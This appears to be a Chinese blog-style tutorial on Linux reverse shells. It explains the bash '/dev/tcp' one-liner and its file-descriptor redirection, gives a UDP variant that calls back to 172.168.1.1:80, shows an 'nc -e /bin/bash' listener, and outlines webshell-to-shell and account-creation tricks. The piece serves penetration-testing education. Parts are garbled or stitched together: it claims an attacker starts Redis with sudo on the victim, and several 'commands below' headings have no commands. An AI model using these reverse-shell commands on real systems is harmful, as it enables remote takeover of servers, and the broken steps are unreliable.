linux 反弹?shell反弹
linux中反弹shell攻击原理
在Linux中,反弹shell攻击是一种黑客技术,通过这个技术,黑客可以在目标服务器上实现远程控制,进行各种恶意操作。反弹shell的实现主要分为两大部分:常规攻击和反弹shell。常规攻击通常包括对服务器进行漏洞扫描、尝试暴力破解密码等。当常规攻击手段失败后,黑客往往会采用反弹shell技术来获取权限。
反弹shell的核心在于让被攻击端主动发起连接。黑客首先需要在被攻击服务器上设置主动连接的命令。这个过程通常利用了系统中的漏洞,比如Redis漏洞。Redis是一种常用的内存数据结构存储系统,如果未正确配置密码,黑客可以轻易通过命令行启动Redis服务器时,使用root用户身份启动Redis服务。
Redis服务器在启动时,如果以root用户身份运行,意味着任何通过Redis服务器发起的命令都可能拥有系统级权限。黑客在被攻击服务器上执行如下命令启动Redis:
bash
sudo redis-server
这一步为后续反弹shell操作埋下了伏笔。接下来,黑客通过网络连接到Redis服务器,并执行一系列关键命令,实现反弹shell的建立。
实现反弹shell的关键步骤包括:
攻击端尝试连接Redis服务器,可以使用如下命令进行尝试:
bash
redis-cli-h目标IP-p目标端口
一旦连接成功,黑客就可以利用Redis的特性,执行一系列命令,包括修改配置文件、使用Linux系统计划任务等方式,最终实现反弹shell的建立。在连接成功后,黑客可以通过执行如下命令:
bash
bash-i>&/dev/tcp/目标IP/目标端口 0>&1
这个命令创建了一个与目标IP和目标端口之间的隐蔽连接,随后在连接的另一端创建一个bash shell,实现远程控制。至此,黑客已经成功实现反弹shell,可以进行任意操作。
整个过程展示了黑客利用系统漏洞和精心设计的命令,通过反弹shell技术在Linux服务器上实现远程控制的复杂操作。在实际安全防护中,了解和预防这类攻击至关重要。确保系统和应用的最新补丁和安全配置,严格限制用户权限,以及使用网络监控和入侵检测系统,都是防范此类攻击的有效手段。
反弹shell基础
将这句话拆开来看, bash-i,>&,/dev/tcp/, 0>&1,有三个知识点。
(1) bash-i是打开一个交互的bash
(2)/dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。
(3)>&和 0>&1这两个涉及到Linux文件描述符和重定向。此处的&是取地址符
(1)文件描述符
Linux启动时会默认打开三个文件描述符(实现文件读写操作),Linux把键盘、显示器等设备也当做文件用文件描述符进行控制,如果要修改默认设备就需要进行重定向。
(2)重定向
输入的重定向包括,<和<<,输出的重定向包括,>和>>, n< file代表将文件描述符 n重定向到file指代的文件(以只读方式打开),如果n省略就是0(标准输入)。同理如果是输出的重定向, n> file,n省略则默认是1。
错误输出的重定向有三种形式
其中,&>和>&是一个意思,都是将标准错误输出合并到标准输出中。 2>&1和>file可以用如下过程图表示
需要注意的是,上述输入输出重定向,将输入和输出绑定到文件或者设备只对该条指令有效,如果想要一直有效,就需要添加exec指令 exec n</> file/n
(3)复制
与之形似的是文件描述符的复制 n<&m/ n>&m,这两个都是将文件描述符 n复制到 m,两者的区别是,前者是以只读的形式打开,后者是以写的形式打开,因为读/写方式对于复制操作几乎没有影响所以两者基本可以看作是等价的。这里的&目的是区分以数字为名字的文件和文件描述符的数值,如果没有&系统会认为是将文件描述符重定向到了一个数字作为文件名的文件,而不是另一个文件描述符。
此时再来看这句命令,可与理解为,创建一个可交互的bash和一个到172.168.1.1:80的TCP链接,然后将bash的输入输出错误都重定向到在172.168.1.1:80监听的进程。
首先,反弹shell可以理解为,攻击者监听在TCP/UDP端口,被控制端的请求被转发到该端口,可以控制其输入输出。一般攻击者攻击了一台机器,并用自己的主机去连接该机器的端口,这是一种“正向连接”,远程桌面、web服务、ssh、telnet等都是正向连接的一种。但是如果被攻击的机器处于内网中可能造成无法连接,或者有防火墙等限制,再或者攻击者需要进行实时控制,正向连接是无法满足需要的。所以有了“反向连接”,即让被攻击的主机主动去连接攻击者的服务器。
所以我们还可以从反向连接的角度来理解一下 0>&1。如果只是 bash-i>&/dev/tcp/172.168.1.1/80,将输出描述符连接到了端口,该端口可接收到我们的输出,即我们正向连接了被攻击者的机器,但是我们输入shell后是无法看到回显的。回显只会显示在被攻击者的机器上。如果我们想要得到回显,需要将被攻击机器的输入描述符连接到我们监听的端口上。
也就是说如果我们想要看到回显,除了先将输出描述符连接到端口上,还需要将其输入描述符也连接到端口上。即输入描述符0和输出描述符1连接相同, 0>&1即可解决。这就形成了一个回路,实现了远程交互式shell的功能。
不过这样的一条指令还不够完善,因为这条指令会使得我们在被攻击的机器上依然能看到我们在攻击者机器中执行的指令,那么解决办法就是将错误输出和标准输出进行混合,即将 bash-i>换为 bash-i>&
Bash相关shell主要有以下几种:
刚才详细讲的是第一种bash shell,第二种是将>&这种错误输出的混合方式改成了 2>&1,2代表错误输出,1代表标准输出,2指向了1,即输出混合了。文件描述符的复制 n<&m/ n>&m两种虽然读写不同但是对于shell的效果是等价的,即和 0>&1效果相同。所以第二种就是第一种的变种。第四种同理,输入、输出、报错都定位到同一位置。第五种选了一个新的文件描述符196,道理类似。
对于第三种bash shell,exec已经在前面提到过可以持续连接,后面的关键点如下:
从文件中依次读取每一行,将其赋值给 line变量(其他也可),之后在循环中对line进行操作。这里不再从文件中读取,而是通过管道符对攻击者机器上输入的命令进行依次执行,并且将标准输出和标准错误输出都重定向到了文件描述符5,也就是攻击机上,实现交互式shell的功能。
另外,本文最开始的时候说到/dev/tcp/是Linux中的一个特殊设备类似的还有/dev/udp/,按照tcp的方式直接改成udp就行。
sh-i>&/dev/udp/172.168.1.1/80 0>&1
除了bash还有很多其他借用第三方工具(nc、telnet、socat、xterm)或使用脚本语言(python、Perl、Ruby、Go、PHP、Lua、JAVA、gawk、Powershell)反弹shell的方式,这里就不一一列举了,原理类似。写这篇文章总结shell的过程中顺手将网络上的shell进行了收集,将近80条,写了BashShell.py,就是个简单的查询shell的工具,有需要的下方留言
linux各种一句话反弹shell总结
在Linux系统渗透测试中,获取一个可操作的虚拟终端是关键任务之一。本文总结了在不同场景下,如何利用各种工具获取反弹shell的策略。
###场景一:使用本地监听获取shell
当我们已经获取了一个webshell,想要直接操作主机时,可以使用`nc`工具开启一个本地监听,通过监听端口接收远程连接。若已安装的`nc`缺少反弹shell功能,可以通过下载二进制包手动安装。安装命令如下:
1.1安装netcat
原生版本netcat链接:nchc.dl.sourceforge.net...
安装完成netcat后,使用以下命令开启本地监听并发布本地bash:
1.2开启本地监听
#开启本地8080端口监听,并将本地的bash发布出去。
root# nc-lvvp 8080-t-e/bin/bash
###场景二:内网主机反弹shell
当目标主机为内网主机,无法从外网直接访问时,可以使用webshell主动发起反弹shell连接。常见方法包括:
2.1 bash反弹shell
使用bash结合重定向方法实现反弹shell。具体命令如下:
以下针对常用的bash反弹shell进行了拆分说明,具体内容如下。
2.2 netcat工具反弹
通过安装netcat,使用类似命令开启外网主机监听,并将本地bash反弹给目标主机。具体步骤如下:
2.3 socat反弹shell
Socat作为功能强大的网络工具,提供了与netcat类似的功能,但据说更为强大。使用方法与netcat相似,具体步骤如下:
###场景三:解决获取虚拟终端的问题
在使用反弹shell过程中,可能会遇到交互性差、错误输出显示不全或终端不稳定等问题。解决方法包括:
3.1一句话添加账号
利用脚本式方法,如使用`chpasswd`、`useradd-p`、`echo-e`等方法,确保账号创建时具有良好的交互性。
3.2 python获取标准虚拟终端
通过python获取标准虚拟终端环境,提升交互性和稳定性。具体步骤如下:
###总结与参考
本文总结了在不同场景下获取Linux反弹shell的策略,并提供了关键命令和方法。在学习和使用过程中,参考资源包括GitHub、PentestMonkey等平台,帮助读者快速上手。
